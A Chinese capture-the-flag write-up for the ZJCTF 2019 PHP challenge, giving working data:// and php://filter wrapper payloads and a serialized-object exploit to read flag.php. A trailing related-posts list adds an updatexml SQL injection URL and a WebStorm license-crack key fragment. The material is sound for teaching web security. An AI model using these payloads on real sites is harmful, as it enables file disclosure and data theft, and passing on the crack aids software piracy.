[ZJCTF 2019]NiZhuanSiWei 1

阿新 • • 發佈：2021-07-28

一前置知識點

file_get_contents函式 — 將整個檔案讀入一個字串

二解題

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
     
if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

通過data偽協議寫入檔案繞過第一次檢查，不加base64編碼也可以，加上防止被某些檢查給ban掉。

?file=data:// 
text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

直接file=useless.php是無法讀取php的，php會被執行。所以需要利用php偽協議中的filter過濾器讀取useless.php的base64編碼。

file=php://filter/read=convert.base64-encode/resource=useless.php

解碼得到

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if 
(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

怎麼去給這個類的file成員變數賦上flag.php呢。

else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }

如果我們給變數password賦上經過序列化的並且file變數為flag.php的類Flag，這樣的話，經過unserialize函式，

password變數被反序列化一個類，並且經過echo，會把這個類執行並輸出。

所以本地執行一下構造payload

<?php  

class Flag{  //flag.php  
    public $file="flag.php";  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}
$a = new Flag();//建立物件完之後再序列化
echo serialize($a);
?>

結果為

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

不要忘記給file變數賦值上useless.php，這樣才能被包含上。總的payload為

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

[ZJCTF 2019]NiZhuanSiWei 1

一前置知識點 file_get_contents函式 — 將整個檔案讀入一個字串 ctf中偽協議總結

[ZJCTF 2019]NiZhuanSiWei

[ZJCTF 2019]NiZhuanSiWei 題目 php程式碼審計題 <?php $text = $_GET["text"]; $file = $_GET["file"];

Buuctf-web-[ZJCTF 2019]NiZhuanSiWei

進入之後然後我們看到了一個if if(isset($text)&&(file_get_contents($text,\'r\')===\"welcome to the zjctf\"))

WebStorm 2019.3.1 (破解方法)

破解方法 https://www.jianshu.com/p/d120ab55bfdd 3AGXEJXFK9-eyJsaWNlbnNlSWQiOiIzQUdYRUpYRks5IiwibGljZW5zZWVOYW1lIjoiaHR0cHM6Ly96aGlsZS5pbyIsImFzc2lnbmVlTmFtZSI6IiIsImFzc2lnbmVlRW1haWwiOiIiLCJsaWNlbnNl

BUUCTF-[極客大挑戰 2019]PHP 1

開啟題目，我們就看到這個貓，先是用滑鼠晃了晃，還跟著我的游標搖腦袋。我是來做題的。前端工程師肯定也對這個下功夫了。

BUUCTF-[極客大挑戰 2019]HardSQL 1詳解

來到sql注入騷姿勢，我們一點一點開始學我們來到這道題，然後嘗試注入，結果發現

20192303 2019-2020-1 《資料結構與面向物件程式設計》實驗四報告

課程：《程式設計與資料結構》班級： 1923 姓名：楊佳寧學號：20192303 實驗教師：王志強

2019-2020-1 20181329 《資訊安全系統設計基礎》第七週學習總結

教材學習內容總結一、異常 1、異常是異常控制流的一種形式，它一部分由硬體實現，一部分由作業系統實現。異常是控制流中的突變，用來響應處理器狀態中的某些變化。

[極客大挑戰 2019]PHP 1

進入頁面，檢查原始碼之類的都沒資訊，提到了備份，用御劍掃描出www.zip，直接加在url後

[BJDCTF2020]ZJCTF，不過如此1

進入題目，分析程式碼 file_get_contents() 把整個檔案讀入一個字串中。通過get方式傳入text,file引數，text引數要包含\"i have a dream\"，且file引數正則匹配不能含有flag

20192328牛梓萌 2019-2020-1 《資料結構與面向物件程式設計》實驗八報告

20192328牛梓萌 2019-2020-1 《資料結構與面向物件程式設計》實驗八報告課程：《程式設計與資料結構》

BUUCTF-[極客大挑戰 2019]HardSQL 1

使用updatexml報錯法注入 http://1bfb9fee-1fce-4f07-81b1-c8048e473a66.node3.buuoj.cn/check.php?username=admin\'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21

BUUCTF-[SUCTF 2019]EasySQL 1

好吧這題是我不配看了網上大佬的WP payload1:*,1大佬的解法，好像直接將原始碼猜出來了 select $_GET[\'query\'] || flag from flagpayload2:select1;setsql_mode=pipes_as_concat;select1||flagfromFlagpayload3: